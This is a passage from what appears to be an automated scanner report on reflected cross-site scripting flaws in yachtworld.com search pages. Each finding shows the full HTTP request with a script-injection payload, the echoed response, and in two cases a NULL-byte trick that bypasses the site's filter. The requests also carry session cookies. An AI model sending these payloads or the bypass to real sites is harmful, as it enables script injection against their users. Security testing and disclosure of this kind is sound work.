savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 500 Internal Server Error
Date: Thu, 27 Jan 2011 20:27:48 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<br>'+ 'ExceptionMessage: For input string: "0c63ab';alert(1)//4063b1cc08d"<br>
...[SNIP]...

3.343. http://www.yachtworld.com/core/listing/cache/dimensionValues.jsp [Ne parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/cache/dimensionValues.jsp

Issue detail

The value of the Ne request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ae10'%3balert(1)//333a72b0be8 was submitted in the Ne parameter. This input was echoed as 1ae10';alert(1)//333a72b0be8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /core/listing/cache/dimensionValues.jsp?fromYear=2004&searchtype=homepage&Ntk=boatsEN&sm=3&toLength=32&cit=true&currencyid=100&luom=126&fromPrice=0&fromLength=24&Ne=151ae10'%3balert(1)//333a72b0be8&man=regulator&slim=quick&N=0&is=false&pricderange=Select+Price+Range HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 500 Internal Server Error
Date: Thu, 27 Jan 2011 20:27:14 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<br>'+ 'ExceptionMessage: For input string: "151ae10';alert(1)//333a72b0be8"<br>
...[SNIP]...

3.344. http://www.yachtworld.com/core/listing/cache/pl_search_results.jsp [&lineonly&&type parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/cache/pl_search_results.jsp

Issue detail

The value of the &lineonly&&type request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0630"><script>alert(1)</script>e001cbfdd4e was submitted in the &lineonly&&type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/cache/pl_search_results.jsp?slim=broker&hosturl=starlingmarine&units=Feet&&cit=true&url=starlingmarine&&hosturl=starlingmarine&&ywo=starlingmarine&&lineonly&&type=%28Power%29c0630"><script>alert(1)</script>e001cbfdd4e HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:07:51 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<!-- /opt/weblogic/waeyw/ywcluster/public_html/broker_pages/starlingmarine/boat
...[SNIP]...
<input type="hidden" name="type" value="(Power)c0630"><script>alert(1)</script>e001cbfdd4e" />
...[SNIP]...

3.345. http://www.yachtworld.com/core/listing/cache/pl_search_results.jsp [&type parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/cache/pl_search_results.jsp

Issue detail

The value of the &type request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00fbf1f"><script>alert(1)</script>09410afb976 was submitted in the &type parameter. This input was echoed as fbf1f"><script>alert(1)</script>09410afb976 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /core/listing/cache/pl_search_results.jsp?slim=broker&hosturl=clarkslanding&units=Feet&&cit=true&url=clarkslanding&&hosturl=clarkslanding&&ywo=clarkslanding&&type=%28Power%29%00fbf1f"><script>alert(1)</script>09410afb976&so=0 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 21:34:43 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<!-- /opt/weblogic/waeyw/ywcluster/public_html/broker_pages/clarkslanding/boats
...[SNIP]...
<input type="hidden" name="type" value="(Power).fbf1f"><script>alert(1)</script>09410afb976" />
...[SNIP]...

3.346. http://www.yachtworld.com/core/listing/cache/pl_search_results.jsp [&ywo parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/cache/pl_search_results.jsp

Issue detail

The value of the &ywo request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ab6d"><script>alert(1)</script>a45657f14be was submitted in the &ywo parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /core/listing/cache/pl_search_results.jsp?ps=50&slim=broker&uom=126&ywo=starlingmarine&duom=126&wuom=126&luom=126&ps=50&searchPage=%2Flisting%2Fcache%2Fboats_for_sale_qs.jsp&so=2&slim=broker&hosturl=starlingmarine&units=Feet&&hosturl=starlingmarine&&ywo=starlingmarine8ab6d"><script>alert(1)</script>a45657f14be& HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 21:52:49 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<!-- /opt/weblogic/waeyw/ywcluster/public_html/broker_pages/starlingmarine/boat
...[SNIP]...
<a href="/core/listing/cache/pl_search_results.jsp?slim=broker&hosturl=starlingmarine&units=Feet&ps=50&slim=broker&uom=126&ywo=starlingmarine&ywo=starlingmarine8ab6d"><script>alert(1)</script>a45657f14be&duom=126&wuom=126&luom=126&so=2&ps=50&n=1:1:60529:116152:54&searchPage=%2Flisting%2Fcache%2Fboats_for_sale_qs.jsp">
...[SNIP]...

3.347. http://www.yachtworld.com/core/listing/cache/pl_search_results.jsp [&ywo parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/cache/pl_search_results.jsp

Issue detail

The value of the &ywo request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a26f"><script>alert(1)</script>db381be0f58 was submitted in the &ywo parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/cache/pl_search_results.jsp?slim=broker&hosturl=starlingmarine&units=Feet&&cit=true&url=starlingmarine&&hosturl=starlingmarine&&ywo=starlingmarine1a26f"><script>alert(1)</script>db381be0f58&&lineonly&&type=%28Power%29 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
